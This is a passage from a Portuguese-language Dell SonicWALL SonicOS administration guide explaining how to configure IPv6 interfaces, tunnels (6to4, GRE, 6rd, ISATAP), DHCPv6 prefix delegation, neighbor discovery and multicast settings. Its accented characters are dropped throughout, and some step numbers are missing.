Insira um valor numrico para Transmisses de deteco de endereo duplicado para
especificar o nmero de mensagens consecutivas de solicitao de vizinho enviadas ao
executar a deteco de endereo duplicado (DAD) antes de atribuir um endereo
provisrio interface. Um valor de 0 indica que a DAD no executada na interface.
Do mesmo modo com ARP grtis de IPv4, o n IPv6 usa a mensagem de deteco de vizinho
para detectar um endereo IPv6 duplicado no mesmo link. A DAD deve ser executada em
qualquer endereo Unicast (exceto endereos Anycast) antes de atribuir um provisrio a uma
interface IPv6.
| 1463
Guia Protocolo DHCPv6
Ao configurar uma interface IPv6 no modo DHCPv6, a guia Protocolo exibe informao
adicional sobre DHCPv6.
As informaes a seguir so exibidas na guia Protocolo:

Estado de DHCPv6: Se a interface for configurada para o modo sem monitoramento de
estado, o Estado de DHCPv6 ser Sem monitoramento de estado. Se a interface for
configurada para o modo com monitoramento de estado, o Estado de DHCPv6 ser
Habilitado ou Desabilitado. Quando a interface est no modo DHCPv6 com monitoramento
de estado, passar com o mouse sobre o cone esquerda do Estado de DHCPv6 exibir
a informao atual de anncio de roteador da interface.
Servidor DHCPv6: O endereo IPv6 do servidor DHCPv6.
Endereos com monitoramento de estado obtidos via DHCPv6: Exibe informao
sobre quaisquer endereos IPv6 com monitoramento de estado obtidos.
Servidores DNS: Os endereos IPv6 de quaisquer servidores DNS.
Configurar uma interface para o modo automtico
O modo automtico usa a configurao automtica de endereo sem monitoramento de estado

de IPv6 para atribuir o endereo IPv6. Este modo no requer qualquer configurao de
endereo manual por parte do administrador da rede. O firewall recorre rede e recebe a
informao de prefixo a partir de roteadores vizinhos. O recurso de configurao automtica
de endereo sem monitoramento de estado de IPv6 executa todas as etapas de configurao,
como a atribuio de endereo IPv6, a excluso de endereo devido a conflito de endereos
ou expirao do tempo de vida e a seleo de gateway padro com base nas informaes
coletadas a partir do roteador no link.

Nota O modo automtico s pode ser configurado para a zona de WAN. Por motivos de
segurana, o modo automtico no est disponvel na interface da zona de LAN.
O diagrama a seguir mostra uma topologia de amostra para IPv6 configurado no modo
automtico.
Neste modo, possvel atribuir 2 tipos de endereo IPv6:

Endereo automtico o endereo local do link padro da interface. Nunca expira e no
pode ser editado ou excludo.
Endereo autnomo atribudo a partir da configurao automtica de endereo sem
monitoramento de estado. Os usurios podem excluir manualmente o endereo, caso no
pretendam aguardar at que o tempo de vida vlido do mesmo expire.
| 1465
Para configurar uma interface IPv6 para o modo automtico, realize as seguintes etapas:

Etapa 2 Clique no boto IPv6 no canto superior direito da pgina para exibir endereos IPv6.
Etapa 4 No menu suspenso Atribuio de IP, selecione Automtico.
Etapa 5 Opcionalmente, voc pode optar por inserir um valor numrico para Transmisses de
deteco de endereo duplicado na guia Avanado para especificar o nmero de
mensagens consecutivas de solicitao de vizinho enviadas ao executar a deteco de
endereo duplicado (DAD) antes de atribuir um endereo provisrio interface. Um valor de 0
indica que a DAD no executada na interface.
Configurar uma interface para PPPoE
O protocolo ponto a ponto na Ethernet (PPPoE) para IPv6 permite conectar uma rede de hosts
por meio de um dispositivo de acesso por ponte simples a um concentrador de acesso remoto
na rede IPv6. Cada host usa sua prpria pilha do protocolo ponto a ponto e apresentada ao
usurio uma interface de usurio familiar. O controle de acesso, o faturamento e o tipo de
servio podem ser definidos por usurio, em vez de por site. O PPPoE para IPv4 e IPv6 usa a
mesma interface para evitar mltiplas conexes PPPoE na mesma interface e o PPPoE para
IPv6 no pode ser aplicado por si s, deve ser usado com o PPPoEv4 ao mesmo tempo. Isso
significa que voc deve configurar a atribuio de IPv4 para o modo PPPoE antes de configurar
o PPPoE para IPv6 na interface. Assim que a conexo PPPoE para IPv6 estiver estabelecida,
tambm possvel passar trfego IPv4 e comunicar fora da rede local.
Para configurar uma interface para PPPoE com IPv6, realize as seguintes etapas:
Etapa 1 Navegue at a pgina Rede > Interfaces na interface de gerenciamento.

Etapa 2 Configure uma interface no IPv4 para que use PPPoE.
Etapa 3 Altere o boto de opo Visualizar verso de IP para IPv6.
Etapa 4 Clique no cone Configurar da interface pretendida.
Etapa 5 Configure os parmetros da interface nas guias Geral e Protocolo.

A negociao de NCP de protocolo ponto a ponto s permite negociar os endereos locais de
links que sejam usados para comunicar na rede local, logo deve ser obtido um endereo global
para comunicar fora da rede local.
Etapa 6 Para obter um endereo global, configure a seo Endereo global de PPPoE obtido na guia
Geral.
Existem trs formas de obter um endereo global
Automtico
O endereo global padro definido para automtico, o que fornece um endereo local de link.
a. Selecione Automtico a partir da lista suspensa Atribuio de endereo de PPPoE.
b. Clique no boto OK.
Esttico
a. Selecione o modo Esttico a partir da lista suspensa Atribuio de endereo de PPPoE.
b. Clique no boto OK.
DHCPv6
a. Selecione DHCPv6 a partir da lista suspensa Atribuio de endereo de PPPoEv6.
b. Na guia Avanado, clique nas caixas de seleo Habilitar escuta para anncio de
roteador e Habilitar configurao automtica de endereo sem monitoramento de
estado.
c. Clique no boto OK.
O recurso PPPoE para IPv6 est agora configurado. Para desabilit-lo, clique no boto
Desconectar da interface pretendida na pgina principal Rede > Interfaces.
Configurar uma subinterface de VLAN
O procedimento para configurar uma subinterface de VLAN no IPv6 idntico ao procedimento

no IPv4. Consulte Configurar subinterfaces de VLAN na pgina 209 para mais detalhes.
Todas as subinterfaces de VLAN devem estar configuradas no IPv4 antes de configur-las no
IPv6.
Configurar uma interface para o modo com fio
O procedimento para configurar uma interface no modo com fio no IPv6 idntico ao
procedimento no IPv4. Consulte Configurar uma interface para o modo de cabo na pgina 216
para mais detalhes.
Todas as interfaces no modo com fio devem ser configuradas no IPv4; no possvel editar as
configuraes do modo com fio no IPv6. Qualquer funcionalidade habilitada no IPv4 (por
exemplo, "Propagao do estado de link") aplica-se no IPv6.
Configurar interfaces de tnel de IPv6

Esta seo descreve como tunelar pacotes IPv4 por meio de redes IPv6 e pacotes IPv6 por
meio de redes IPv4. Por exemplo, para passar pacotes IPv6 atravs da rede IPv4, o pacote
IPv6 ser encapsulado em um pacote IPv4 no lado de ingresso de um tnel. Quando o pacote
encapsulado chegar ao lado de egresso do tnel, o pacote IPv4 ser desencapsulado.
| 1467
Os tneis podem ser configurados manual ou automaticamente. Um tnel configurado
determina os endereos de ponto terminal por meio de informao de configurao no n de
encapsulamento. Um tnel automtico determina os pontos terminais IPv4 a partir do endereo
do datagrama IPv6 incorporado. O encapsulamento de difuso seletiva de IPv4 determina os
pontos terminais por meio de descoberta de vizinhana.
O diagrama a seguir representa um tnel de IPv6 para IPv4.
As sees a seguir descrevem a configurao de interfaces de tnel de IPv6:

Configurar o tnel automtico 6to4 na pgina 1468
Configurar retransmisso 6to4 para acesso de prefixo que no 2002 na pgina 1470
Configurar um tnel IPv6 manual na pgina 1472
Configurar um tnel IPv6 GRE na pgina 1473
Delegao de prefixo IPv6 na pgina 1473
Configurar a delegao de prefixo IPv6 na interface upstream na pgina 1474
Configurar a delegao de prefixo IPv6 na interface downstream na pgina 1477
Interfaces de tnel 6rd na pgina 1481
Configurar uma interface de tnel 6rd na pgina 1482
Configurar um tnel ISATAP na pgina 1485
Configurar o tnel automtico 6to4

O tnel automtico 6to4 um tnel automtico: os pontos terminais do tnel so extrados do
datagrama IPv6 encapsulado. No necessria qualquer configurao manual.
Os tneis 6to4 usam um prefixo no formato "2002:tunnel-IPv4-address::/48" para tunelar
trfego IPv6 sobre IPv4. (por exemplo, se o ponto terminal IPv4 do tnel possuir o endereo
a01:203, o prefixo do tnel 6to4 ser "2002:a01:203::1.") Os roteadores anunciam um prefixo
no formato "2002:[IPv4]:xxxx/64" para clientes IPv6. Para obter informaes completas,
consulte RFC 3056.

O diagrama a seguir mostra uma topologia de amostra de tnel automtico 6to4.
No exemplo, os clientes no precisam especificar o ponto terminal do tnel, mas precisam

somente de habilitar o tnel automtico 6to4. Todos os pacotes com um prefixo 2002 sero
roteados para o tnel e o destino IPv4 do tnel ser extrado do endereo IPv6 de destino.
Os tneis 6to4 so fceis de configurar e usar. Os usurios devem ter um endereo IPv4 e um
endereo IPv6 globais, que tambm devero possuir um prefixo 2002. Por conseguinte, em
geral, o usurio s pode acessar o recurso de rede com um prefixo 2002.
Nota S pode ser configurado um tnel automtico 6to4 no firewall.
| 1469
Para configurar o tnel 6to4 no firewall, realize as seguintes etapas:

Etapa 3 Selecione a Zona para a interface de tnel 6to4. Geralmente, esta a interface de WAN.
Etapa 4 No menu suspenso Tipo de tnel, selecione Interface de tnel automtico 6to4.
Etapa 5 Por padro, o Nome da interface definido para 6to4AutoTun.
Etapa 6 Selecione a caixa de seleo Habilitar tnel 6to4 de IPv6.
Etapa 7 Opcionalmente, possvel configurar o Login de gerenciamento ou Login de usurio via
tnel 6to4.
Configurar retransmisso 6to4 para acesso de prefixo que no 2002
Por padro, um tnel automtico 6to4 s pode acessar o destino com um prefixo 2002. O
recurso de retransmisso 6to4 pode ser usado para acessar destinos de prefixo que no 2002.

Para habilitar a retransmisso 6to4, acesse Rede > Roteamento. Em seguida, clique no boto
Adicionar para criar uma poltica de rota que permita rotear todo o trfego destinado a prefixos
2003 por meio da interface de tnel automtico 6to4, conforme mostrado no exemplo a seguir:
Esta rota esttica pode ser adicionada na interface de tnel automtico 6to4 para habilitar o
recurso de retransmisso, o que torna possvel acessar o destino IPv6 com prefixo que no
2002: via tnel 6to4. Observe que o gateway deve ser o endereo IPv6 com o prefixo 2002:.
| 1471
Configurar um tnel IPv6 manual
Para configurar o tnel 6to4 no firewall, realize as seguintes etapas:

Etapa 3 Selecione a Zona para a interface de tnel.

Etapa 4 No menu suspenso Tipo de tnel, selecione Interface de tnel manual IPv6.
Etapa 5 Insira um Nome para a interface de tnel.
Etapa 6 Insira o Endereo IPv4 remoto para o ponto terminal do tnel.
Etapa 7 Para a Rede IPv6 remota, selecione um objeto de endereo IPv6, o qual pode ser um grupo,
um intervalo, uma rede ou um host.
Etapa 8 Opcionalmente, possvel configurar o Login de gerenciamento ou Login de usurio via
tnel 6to4.

Configurar um tnel IPv6 GRE
GRE pode ser usado para tunelar trfego IPv4 e IPv6 sobre IPv4 ou IPv6. Os tneis GRE so
estticos e ambos os pontos terminais so especificados manualmente. O diagrama a seguir
mostra uma amostra de tnel IPv6 GRE.
Um tnel GRE configurado da mesma forma que um tnel manual, com a exceo de que
selecionada a Interface de tnel GRE no Tipo de tnel.
Delegao de prefixo IPv6

A delegao de prefixo IPv6, tambm conhecida como Delegao de prefixo DHCPv6
(DHCPv6-PD), uma extenso de DHCPv6. Em DHCPv6, os endereos so atribudos por um
servidor DHCPv6 a um host IPv6. Em DHCPv6-PD, so atribudos endereos completos de
sub-rede IPv6 e outros parmetros por um servidor DHCPv6-PD a um cliente DHCPv6-PD.
| 1473
Quando DHCPv6-PD est habilitada, aplicada em todas as interfaces DHCPv6 associadas
zona de WAN. DHCPv6-PD um modo de configurao de sub-rede adicional que coexiste
com DHCPv6.
O endereo IPv6 uma combinao do prefixo fornecido pelo servidor DHCPv6-PD e do sufixo
fornecido pelo cliente DHCPv6-PD. Por padro, o comprimento do prefixo 64, mas pode ser
editado.
Quando o firewall iniciado, automaticamente criado um grupo de objetos de endereos
padro denominado Prefixos de delegao de DHCPv6. Os prefixos delegados da interface
upstream so membros deste grupo.
A delegao de prefixo IPv6 configurada em:
Uma interface upstream
Uma ou mais interfaces downstream
Quando a interface upstream aprende a delegao de prefixo do servidor DHCPv6-PD, o
SonicOS calcula e aplica os prefixos de endereo IPv6 em todas as interfaces downstream e
estas interfaces anunciam esta informao em todos os hosts nos respectivos segmentos de
rede.
Esta seo contm os seguintes procedimentos de configurao:
Configurar a delegao de prefixo IPv6 na interface upstream na pgina 1474
Configurar a delegao de prefixo IPv6 na interface downstream na pgina 1477
Nota Antes de voc desabilitar a delegao de prefixo em sua rede, recomendamos que libere
primeiro a delegao de prefixo na interface upstream.
Configurar a delegao de prefixo IPv6 na interface upstream
Para configurar a delegao de prefixo IPv6 na interface upstream:

Etapa 2 Em Visualizar verso de IP, selecione IPv6.

Etapa 3 Clique no cone Editar na coluna Configurar da interface que voc deseja configurar como
interface upstream. A caixa de dilogo Editar interface aparece.
Etapa 4 A Zona ser sempre WAN.

Etapa 5 No menu Atribuio de IP, selecione DHCPv6.
Etapa 6 Selecione a opo Habilitar delegao de prefixo DHCPv6.
Etapa 7 No menu Modo DHCPv6, selecione Manual.
| 1475
Etapa 8 Para consultar a informao do DHCPv6 configurado, clique na guia Protocolo.
No painel Informaes gerais do DHCPv6, exibido o DUID de DHCPv6.
No painel Endereos com monitoramento de estado obtidos via DHCPv6, exibida a IAID.
No painel Prefixos delegados obtidos via DHCPv6, exibida a IAID delegada.

Etapa 9 Clique no boto Renovar.
exibida a informao nas outras colunas.
Configurar a delegao de prefixo IPv6 na interface downstream
Para configurar a delegao de prefixo IPv6 na interface downstream:

Etapa 2 Selecione a opo IPv6.
Etapa 3 Clique no cone Editar na coluna Configurar da interface que voc deseja configurar como
interface downstream. Aparece a caixa de dilogo Editar interface.
Etapa 4 Selecione a opo Habilitar anncio de roteador.
| 1477
Etapa 5 Clique na guia Avanado. Aparece a caixa de dilogo Editar interface.
Se o prefixo upstream for obtido, exibido no painel Endereos IPv6.
Etapa 6 Se no for possvel obter o prefixo upstream, exibido um endereo alternativo no painel
Endereos IPv6.

Etapa 7 Clique no boto Adicionar endereo para exibir a caixa de dilogo Adicionar endereo IPv6.
Etapa 8 Selecione a opo Adicionar endereo IPv6 delegado downstream.

Etapa 9 (Opcional) Selecione a opo Anunciar prefixo de sub-rede do endereo IPv6 esttico.
| 1479
Etapa 10 Clique na guia Anncio de roteador.
Etapa 11 Selecione a opo Habilitar anncio de roteador.
Se voc tiver selecionado a opo Anunciar prefixo de sub-rede do endereo IPv6 esttico
na guia Geral, o prefixo ser listado no painel Configuraes da lista de prefixos.
Etapa 12 Para ver suas novas interfaces IPv6 PD, acesse a pgina Rede > Roteamento.
Etapa 13 Selecione a opo IPv6.
So exibidas as duas novas interfaces IPv6 com delegao de prefixo (upstream e
downstream).

Interfaces de tnel 6rd
A rpida implantao do IPv6 (6rd) permite que o IPv6 seja implantado em uma rede IPv4 de
forma rpida e fcil. A 6rd usa os prefixos existentes do endereo IPv6 de um provedor de
servios, assegurando que o domnio operacional de 6rd fica limitado rede do provedor de
servios e sob controle direto do provedor de servios.
Uma interface de tnel 6rd uma interface virtual que transporta pacotes IPv6 encapsulados
de 6rd em uma rede IPv4.
Nota Uma interface de tnel 6rd deve estar vinculada a uma interface fsica ou virtual.
Quando 6rd est implantada, o servio IPv6 equivalente ao IPv6 nativo. O mapeamento 6rd
de endereos IPv6 para endereos IPv4 permite a determinao automtica de pontos
terminais de tnel IPv4 a partir de prefixos IPv6, permitindo a operao sem monitoramento de
estado de 6rd.
Um domnio 6rd composto por vrios roteadores de ponta de cliente (CE) 6rd e um ou mais
roteadores de retransmisso de borda (BR) 6rd. Os pacotes IPv6 encapsulados por 6rd
seguem a topologia de roteamento de IPv4 na rede do provedor de servios.
Uma implementao de 6rd tpica usando roteadores de ponta de cliente e roteadores de
retransmisso de borda requer somente uma interface de tnel 6rd. Um roteador de
retransmisso de borda que sirva mltiplos domnios 6rd poder ter mais do que uma interface
de tnel 6rd. Porm, cada domnio 6rd pode ter somente uma interface de tnel 6rd.
Os pacotes IPv6 atravessam as retransmisses de borda quando entram ou saem do domnio
6rd de um provedor de servios. Uma vez que a 6rd sem monitoramento de estado, os
pacotes podem ser enviados para as retransmisses de borda usando o mtodo Anycast, no
qual os pacotes de uma nica origem so roteados para o n mais prximo em um grupo de
potenciais destinatrios ou para vrios ns, todos identificados pelo mesmo endereo de
destino.
Os provedores de servios podem implantar a 6rd em um nico domnio ou em mltiplos
domnios. Um domnio 6rd pode ter somente um prefixo 6rd. Diferentes domnios 6rd devem
usar prefixos 6rd diferentes.
Na pgina Rede > Roteamento, no painel Polticas de rota, existem quatro polticas de rota
padro para interfaces de tnel 6rd.
| 1481
Existem dois modos de configurao:
Manual
DHCP
Os quatro parmetros 6rd a seguir podem ser definidos manualmente, ou automaticamente
pelo servidor DHCPv4, caso voc selecione DHCP como o modo de configurao.
Comprimento da mscara IPv4
Prefixo 6rd
Comprimento do prefixo 6rd
Endereo BR IPv4 de 6rd
No modo DHCP, os parmetros 6rd so recebidos a partir da interface de vinculao. No modo
manual, os parmetros 6rd devem ser configurados manualmente.
Configurar uma interface de tnel 6rd
Uma interface de tnel 6rd configurada da mesma forma que as outras interfaces de tnel
IPv6. necessria uma interface de vinculao para configurar uma interface de tnel 6rd.
Para configurar uma interface de tnel 6rd:

Etapa 2 Em Visualizar verso de IP, selecione IPv6.

Etapa 3 Na parte inferior do painel Configuraes de interface, clique no boto Adicionar interface.
Nota A guia Protocolo s exibida quando voc seleciona DHCP como o Modo de
configurao.
Etapa 4 No menu Zona, selecione WAN.

Etapa 5 O menu Tipo de interface desabilitado. J se encontra selecionada a opo Interface de
tnel, uma vez que foi selecionada no menu Adicionar interface na Etapa 3.
Etapa 6 No menu Tipo de tnel, selecione Interface de tnel 6rd.
Etapa 7 Na caixa do nome, insira o nome de sua interface de tnel ou, por exemplo, Tnel 6rd.
Etapa 8 Na caixa Endereo IPv6 de interface de tnel, insira o endereo IPv6 da interface de tnel.
Por exemplo, 2001::2.
Etapa 9 Na caixa Comprimento do prefixo, insira o comprimento do prefixo IPv6. Por exemplo, 64.
Etapa 10 No menu Vincular a, selecione a interface que voc pretende; por exemplo, X1.
Etapa 11 No menu Modo de configurao, selecione o modo que pretende. Manual ou DHCP.
Nota Se voc selecionar Manual como o Modo de configurao, realize as etapas 12 a 15.
Se voc selecionar DHCP como o Modo de configurao, ignore as etapas 12 a 15.
Etapa 12 Na caixa Prefixo 6rd, insira o prefixo 6rd; por exemplo, 2222:2222::
(somente no modo Manual).
| 1483
Etapa 13 Na caixa Comprimento do prefixo 6rd, insira o comprimento do prefixo 6rd; por exemplo, 32
Etapa 14 Na caixa Comprimento da mscara IPv4, insira o comprimento da mscara de sub-rede IPv4
Etapa 15 Na caixa Endereo BR IPv4, insira o endereo IPv4 da retransmisso de borda 6rd
Etapa 16 (Opcional) Na caixa Comentrio, insira um comentrio para descrever a interface de tnel.
Etapa 17 Selecione a opo Adicionar rota padro automaticamente.
Etapa 18 Selecione as opes de Gerenciamento ou as opes de Login de usurio que desejar.
Se voc tiver selecionado Manual como o Modo de configurao, suas configuraes da
interface de tnel 6rd so exibidas na guia Geral.

Se voc tiver selecionado DHCP como o Modo de configurao, suas configuraes da
interface de tnel 6rd so exibidas na guia Protocolo.
Configurar um tnel ISATAP
O ISATAP (protocolo de endereamento de encapsulamento automtico intrassite) pode ser

usado para estabelecer a conectividade IPv6 por meio de uma infraestrutura somente de IPv4.
ISATAP um mecanismo de encapsulamento simples que conecta o n de pilha dual (IPv6/
IPv4) com outros ns de pilha dual ou ns IPv6 via redes IPv4. A rede IPv4 vista pelo ISATAP
como uma camada de link para IPv6.
O ISATAP pode ser usado em vrios cenrios para estabelecer a conectividade unicast entre
hosts ISATAP e hosts em redes IPv6.
A Figura 1 mostra a entrega de trfego ISATAP entre hosts ISATAP na mesma sub-rede
ISATAP lgica:
Figura 1
A Figura 2 mostra a entrega de trfego ISATAP entre hosts em diferentes sub-redes ISATAP:
| 1485
Figura 2
A Figura 3 mostra a entrega de pacotes entre hosts ISATAP e hosts em uma rede
compatvel com IPv6.
Figura 3
No cenrio apresentado na Figura 1, os hosts ISATAP podem comunicar diretamente entre si

sem passar pelo roteador ISATAP ou pela rede IPv6. Isso permite que um aplicativo compatvel
com IPv6 aproveite a conectividade de uma infraestrutura IPv4 existente.

Os outros dois cenrios requerem que o roteador ISATAP possua uma interface IPv6
conectada com a rede IPv6 que suporta o encaminhamento entre a rede IPv4 para a interface
ISATAP e a interface IPv6.
O ISATAP precisa ser implantado e executado no host e no roteador. O suporte do n de pilha
dual est habilitado, por padro, nas plataformas Windows XP e Windows 7.
O suporte de ISATAP no UTM permite que Dell SonicWALL opere como um roteador ISATAP
em interfaces para LAN e encaminhe pacotes IPv6 entre a interface de encapsulamento
ISATAP e a interface IPv6 conectada com a rede IPv6.
Para configurar um tnel ISATAP, execute as seguintes tarefas:
Etapa 1 Na pgina Rede > Interfaces, em Visualizar verso de IP, selecione IPv6.
Etapa 3 Na guia Geral, selecione a Zona da interface de tnel.

Etapa 4 Na lista suspensa Tipo de tnel, selecione Interface de tnel ISATAP.
Etapa 5 Insira um Nome para a interface de tnel.
Etapa 6 Vincular a endereo IPv4 de selecione uma interface na lista suspensa. O tnel ISATAP usa
o endereo IPv4 da interface de vinculao como o endereo final IPv4 do tnel 6over4.
Etapa 7 Prefixo de sub-rede IPv6 selecione um objeto de endereo na lista suspensa (ou selecione
Criar um novo objeto de endereo). O prefixo de sub-rede IPv6 um prefixo de 64 bits e
usado pelos hosts ISATAP para a configurao automtica de endereo ISATAP.
Etapa 8 MTU de link de interface de tnel a MTU recomendada para o link da interface. Um valor
de 0 significa que o firewall no anunciar a MTU de link para o link.
| 1487
o(s) protocolo(s) de gerenciamento suportado(s): HTTPS, Ping ou SNMP.
usurio.
Adicionalmente, possvel especificar como o SonicOS resolve consultas de host ISATAP:
Etapa 1 Navegue at a pgina Configuraes de firewall > Avanado.

Etapa 2 Localize a seo Configuraes avanadas de IPv6.
Habilitar resposta de consulta de nome NetBIOS para ISATAP selecione esta
opo caso voc pretenda que o dispositivo de segurana responda a uma consulta
NetBIOS para ajudar os hosts ISATAP a resolver o nome em um endereo IPv4.
ISATAP de nome resolvido vlido durante (segundos) insira um perodo de
tempo (em segundos).
Acessar a interface de usurio Dell SonicWALL usando IPv6

Aps configurar o endereamento IPv6 no firewall, a interface de usurio Dell SonicWALL pode
ser acessada inserindo o IPv6 do firewall no campo URL de seu navegador.
Configurao da rede IPv6

DNS de IPv6 na pgina 1489
Objetos de endereos na pgina 1489
Roteamento com base em poltica na pgina 1490
Polticas de NAT de IPv6 na pgina 1490
Protocolo de descoberta de vizinhana na pgina 1491
Roteamento de difuso seletiva na pgina 1493
Configurao de DHCPv6 na pgina 1494

DNS de IPv6
O DNS para IPv6 configurado usando o mesmo mtodo que usado para IPv4. Clique na
opo IPv6 no boto de opo Visualizar verso de IP no canto superior esquerdo da pgina
Rede > DNS.
Objetos de endereos
Os grupos de endereos ou objetos de endereos IPv6 podem ser adicionados da mesma

forma que os objetos de endereos IPv4. Na pgina Rede > Objetos de endereos, o boto
de opo Visualizar verso de IP possui trs opes: Somente IPv4, somente IPv6 ou IPv4
e IPv6.
Nota So suportados objetos de endereos do tipo Host, Intervalo e Rede. Os objetos de

endereos dinmicos para MAC e FQDN no so atualmente suportados para hosts IPv6.
As interfaces IPv4 definem um par de objetos de endereos padro (DAO) e um grupo de

objetos de endereos para cada interface. A regra bsica para DAO de IPv4 que cada
endereo IPv4 corresponde a 2 objetos de endereos: IP de interface e sub-rede de interface.
Existem tambm pares de grupos AO para IP de interfaces de zonas, sub-redes de zonas,
todos os IP de interfaces, todos os IP de gerenciamento de interfaces, etc.
A interface IPv6 prepara o mesmo conjunto DAO para cada interface. Uma vez que possvel
atribuir mltiplos IPv6 a uma interface, todos esses endereos podem ser adicionados,
editados e excludos dinamicamente. Por conseguinte, os DAO de IPv6 precisam ser criados
e excludos dinamicamente.
| 1489
Para tratar disso, os DAO no so gerados dinamicamente para interfaces IPv6. So criados
somente DAO de interface limitados, o que resulta em suporte limitado para outro mdulo que
precise acessar DAO de interface.
O roteamento com base em poltica totalmente suportado para IPv6 selecionando gateways
e objetos de endereos IPv6 para polticas de rota na pgina Rede > Roteamento. Na pgina
Rede > Roteamento, o boto de opo Visualizar verso de IP possui trs opes: Somente
IPv4, somente IPv6 ou IPv4 e IPv6. O recurso OSPF exibe dois botes de opo para alternar
entre a verso 2 e a verso 3.
O Protocolo de Informaes de Roteamento da prxima gerao (RIPng) um protocolo de

roteamento de informaes para IPv6 que permite a troca de informaes entre os roteadores
para calcular rotas por meio de uma rede baseada no IPv6.
adicionado um boto de opo para alternar entre RIP e RIPng:
Polticas de NAT de IPv6

As polticas de NAT podem ser configuradas para IPv6 selecionando objetos de endereos
IPv6 na pgina Rede > Polticas de NAT. Na pgina Rede > Polticas de NAT, o boto de
opo Visualizar verso de IP possui trs opes: Somente IPv4, somente IPv6 ou IPv4 e
IPv6.
Ao configurar polticas de NAT de IPv6, os objetos de origem e destino s podem ser objetos
de endereos IPv6.
Nota A investigao de IPv6 para polticas de NAT no atualmente suportada.

Protocolo de descoberta de vizinhana
O protocolo de descoberta de vizinhana (NDP Neighbor Discovery Protocol) um novo

protocolo de mensagens que foi criado como parte do IPv6 para executar vrias tarefas que
ICMP e ARP realizam no IPv4. Tal como ARP, a descoberta de vizinhana cria um cache de
entradas dinmicas e o administrador pode configurar entradas estticas de descoberta de
vizinhana. A tabela a seguir mostra as funes e mensagens de vizinhana do IPv6 que so
anlogas s mensagens de vizinhana tradicionais do IPv4.
Mensagem de vizinhana do IPv4 Mensagem de vizinhana do IPv6

Mensagem de solicitao de ARP Mensagem de solicitao de vizinhana
Mensagem de retransmisso de ARP Mensagem de anncio de vizinhana
Cache de ARP Cache vizinho
ARP gratuito Deteco de endereo duplicado
Mensagem de solicitao de roteador Solicitao de roteador (obrigatria)
(opcional)
Mensagem de anncio de roteador Anncio de roteador (obrigatrio)
(opcional)
Mensagem de redirecionamento Mensagem de redirecionamento
O recurso NDP esttico permite que sejam criados mapeamentos estticos entre um endereo
IPv6 de camada 3 e um endereo MAC de camada 2.
| 1491
Para configurar uma entrada NDP esttica, execute as seguintes etapas:
Etapa 1 Navegue at a pgina Rede > Descoberta de vizinhana e, em seguida, clique no boto
Adicionar.
Etapa 2 No campo Endereo IP, insira o endereo IPv6 do dispositivo remoto.

Etapa 3 No menu suspenso Interface, selecione a interface no firewall que ser usada para a entrada.
Etapa 4 No campo Endereo MAC, insira o endereo MAC do dispositivo remoto.
Etapa 5 Clique em OK. A entrada NDP esttica adicionada.
A tabela Cache NDP exibe todos os vizinhos IPv6 atuais. So exibidos os seguintes tipos
de vizinhos:
ALCANVEL o vizinho alcanvel no espao de 30 segundos.
OBSOLETO o vizinho j no alcanvel e o trfego foi enviado para o vizinho no
espao de 1200 segundos.
ESTTICO o vizinho foi manualmente configurado como um vizinho esttico.

Roteamento de difuso seletiva
A pgina Rede > Roteamento de difuso seletiva usada para definir configuraes de
difuso seletiva para IPv6, as quais se dividem nas duas sees a seguir:
Proxy de difuso seletiva na pgina 1493
Descoberta de ouvinte de difuso seletiva na pgina 1494
Proxy de difuso seletiva
Manter a interoperabilidade entre as redes IPv6 e IPv4 um dos principais desafios da

implementao de IPv6 em uma rede. Embora a converso de difuso seletiva com base em
pacotes possa ser usada, a Dell SonicWALL suporta uma soluo de proxy de difuso seletiva
que pode ser implantada na fronteira entre as redes IPv6 e IPv4. A Dell SonicWALL recebe
dados de difuso seletiva da rede IPv4, armazena-os em cache e, em seguida, transmite os
dados para a rede IPv6 por meio de difuso seletiva. (E vice-versa para enviar dados de
difuso seletiva de IPv6 para a rede IPv4.) No necessria converso com base em pacotes
para esta operao.
Para configurar o proxy de difuso seletiva entre as redes IPv6 e IPv4, execute as seguintes
etapas:
Etapa 1 Navegue at a pgina Rede > Roteamento de difuso seletiva.

Etapa 2 Marque a caixa de seleo Habilitar proxy de difuso seletiva.
Etapa 3 No menu suspenso Interface upstream, selecione a interface que ser conectada rede IPv6.
Etapa 4 No menu suspenso Interface downstream, selecione a interface que ser conectada rede
IPv4.
Etapa 5 Clique no boto Aceitar. aplicado proxy aos dados de difuso seletiva \.
| 1493
Descoberta de ouvinte de difuso seletiva
O protocolo de descoberta de ouvinte de difuso seletiva (MLD Multicast Listener Discovery)

usado pelos roteadores IPv6 para descobrir ouvintes de difuso seletiva que esto
diretamente conectados ao firewall. O MLD executa no IPv6 uma funo idntica ao IGMP no
IPv4. Existem duas verses do MLD. MLDv1 semelhante ao IGMPv2 e MLDv2 semelhante
ao IGMPv3.
Verso do MLD RFC URL
MLDv1 RFC 2710 http://tools.ietf.org/html/rfc2710
MLDv2 RFC 3810 http://tools.ietf.org/html/rfc3810
A funcionalidade MLD no requer qualquer configurao explcita. Existem vrias variveis

que podem ser ajustadas para modificar o comportamento de MLD:
Intervalo de consulta do roteador de difuso seletiva: Especifica o tempo, em
segundos, entre consultas MLD. O valor padro 125 segundos.
Intervalo de consulta do ltimo ouvinte de difuso seletiva: O tempo mximo que o
roteador aguarda antes de excluir uma porta no respondente do grupo de difuso seletiva.
Reduzir este valor diminuir o tempo necessrio para que o firewall detecte a partida do
ltimo ouvinte para uma origem ou um endereo de difuso seletiva. O valor padro 1000
milissegundos (1 segundo).
Intervalo de resposta de consulta do roteador de difuso seletiva: O atraso mximo
de resposta que inserido nas consultas MLD peridicas. Ao variar o intervalo de resposta
de consulta do roteador de difuso seletiva, um administrador pode ajustar a aglomerao
de mensagens MLD no link; valores elevados tornam o trfego menos aglomerado, uma
vez que as respostas dos hosts se repartem por um intervalo maior. O intervalo de resposta
de consulta do roteador de difuso seletiva deve ser inferior ao intervalo de consulta. O
valor padro 10 000 milissegundos (10 segundos).
Varivel de robustez do roteador de difuso seletiva: Especifica o nmero de consultas
que sero enviadas sem resposta antes de o destino ser excludo. Esta varivel permite o
ajuste do protocolo de acordo com a perda de pacote esperada em um link. Para links com
perda (conexes sem fio, por exemplo), o valor da varivel de robustez pode ser
aumentado. O valor padro 2. A varivel de robustez no deve ser configurada com um
valor inferior a 2.
Configurao de DHCPv6
O servidor DHCPv6 pode ser configurado da mesma forma que IPv4 aps selecionar a opo
IPv6 no boto de opo Visualizar verso de IP no canto superior esquerdo da pgina Rede
> DNS.

Configurao das regras de acesso de IPv6
As regras de acesso do firewall de IPv6 podem ser configuradas da mesma forma que as
